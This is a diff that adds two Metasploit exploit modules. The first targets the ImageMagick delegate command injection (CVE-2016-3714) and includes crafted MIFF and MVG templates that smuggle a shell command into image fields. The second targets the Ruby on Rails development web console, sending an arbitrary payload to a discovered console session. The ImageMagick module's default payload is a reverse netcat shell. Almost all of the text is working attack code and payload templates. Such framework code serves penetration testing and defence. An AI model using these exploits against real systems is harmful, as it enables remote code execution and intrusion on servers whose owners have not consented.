diff --git a/data/exploits/CVE-2016-3714/msf.miff b/data/exploits/CVE-2016-3714/msf.miff new file mode 100644 index 0000000000..faef4019ff --- /dev/null +++ b/data/exploits/CVE-2016-3714/msf.miff @@ -0,0 +1,14 @@ +id=ImageMagick version=1.0 +class=DirectClass colors=0 matte=False +columns=1 rows=1 depth=16 +colorspace=sRGB +page=1x1+0+0 +rendering-intent=Perceptual +gamma=0.454545 +red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06 +white-point=0.3127,0.329 +date:create=2016-05-04T00:19:42-05:00 +date:modify=2016-05-04T00:19:42-05:00 +label={";echo vulnerable"} + +:ÿÿÿÿÿÿ diff --git a/data/exploits/CVE-2016-3714/msf.mvg b/data/exploits/CVE-2016-3714/msf.mvg new file mode 100644 index 0000000000..f53afc7afc --- /dev/null +++ b/data/exploits/CVE-2016-3714/msf.mvg @@ -0,0 +1,8 @@ +push graphic-context +encoding "UTF-8" +viewbox 0 0 1 1 +affine 1 0 0 1 0 0 +push graphic-context +image Over 0,0 1,1 'https://localhost";echo vulnerable"' +pop graphic-context +pop graphic-context diff --git a/data/exploits/CVE-2016-3714/msf.svg b/data/exploits/CVE-2016-3714/msf.svg new file mode 100644 index 0000000000..2b3181763c --- /dev/null +++ b/data/exploits/CVE-2016-3714/msf.svg @@ -0,0 +1,5 @@ + + + + diff --git a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb new file mode 100644 index 0000000000..ead6381ad8 --- /dev/null +++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb @@ -0,0 +1,92 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution', + 'Description' => %q{ + This module exploits a remote code execution feature of the Ruby on Rails + framework. This feature is exposed if the config.web_console.whitelisted_ips + setting includes untrusted IP ranges and the web-console gem is enabled. + }, + 'Author' => ['hdm'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/rails/web-console' ] + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => false, + 'Targets' => [ ['Automatic', {} ] ], + 'DefaultOptions' => { "PrependFork" => true }, + 'DisclosureDate' => 'May 2 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(3000), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/missing404"]) + ], self.class) + + end + + # + # Identify the web console path and session ID, then inject code with it + # + def exploit + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET' + }, 25) + + if ! res + print_error("Error: No response requesting #{datastore['TARGETURI']}") + return + end + + if res.body.to_s !~ /data-mount-point='([^']+)'/ + if res.body.to_s.index("Application Trace") && res.body.to_s.index("Toggle session dump") + print_error("Error: The web console is either disabled or you are not in the whitelisted scope") + else + print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}") + end + return + end + + console_path = $1 + "/repl_sessions" + + if res.body.to_s !~ /data-session-id='([^']+)'/ + print_error("Error: No session id found requesting #{datastore['TARGETURI']}") + return + end + + session_id = $1 + + print_status("Sending payload to #{console_path}/#{session_id}") + res = send_request_cgi({ + 'uri' => console_path + "/" + session_id, + 'method' => 'PUT', + 'headers' => { + 'Accept' => 'application/vnd.web-console.v2', + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'vars_post' => { + 'input' => payload.encoded + } + + }, 25) + + handler + end +end diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb new file mode 100644 index 0000000000..1ff74bc034 --- /dev/null +++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb @@ -0,0 +1,87 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit + + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ImageMagick Delegate Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a shell command injection in the way "delegates" + (commands for converting files) are processed in ImageMagick versions + <= 7.0.1-0 and <= 6.9.3-9 (legacy). + + Since ImageMagick uses file magic to detect file format, you can create + a .png (for example) which is actually a crafted SVG (for example) that + triggers the command injection. + + Tested on Linux, BSD, and OS X. You'll want to choose your payload + carefully due to portability concerns. Use cmd/unix/generic if need be. + }, + 'Author' => [ + 'stewie', # Vulnerability discovery + 'Nikolay Ermishkin', # Vulnerability discovery + 'wvu', # Metasploit module + 'hdm' # Metasploit module + ], + 'References' => [ + %w{CVE 2016-3714}, + %w{URL https://imagetragick.com/}, + %w{URL http://seclists.org/oss-sec/2016/q2/205}, + %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab}, + %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456} + ], + 'DisclosureDate' => 'May 3 2016', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => { + 'BadChars' => "\x22\x27\x5c", # ", ', and \ + 'Compat' => { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic netcat bash-tcp' + } + }, + 'Targets' => [ + ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg + ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg + ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat', + 'LHOST' => Rex::Socket.source_address, + 'DisablePayloadHandler' => false, + 'WfsDelay' => 9001 + } + )) + + register_options([ + OptString.new('FILENAME', [true, 'Output file', 'msf.png']) + ]) + end + + def exploit + if target.name == 'SVG file' + p = Rex::Text.html_encode(payload.encoded) + else + p = payload.encoded + end + + file_create(template.sub('echo vulnerable', p)) + end + + def template + File.read(File.join( + Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template] + )) + end + +end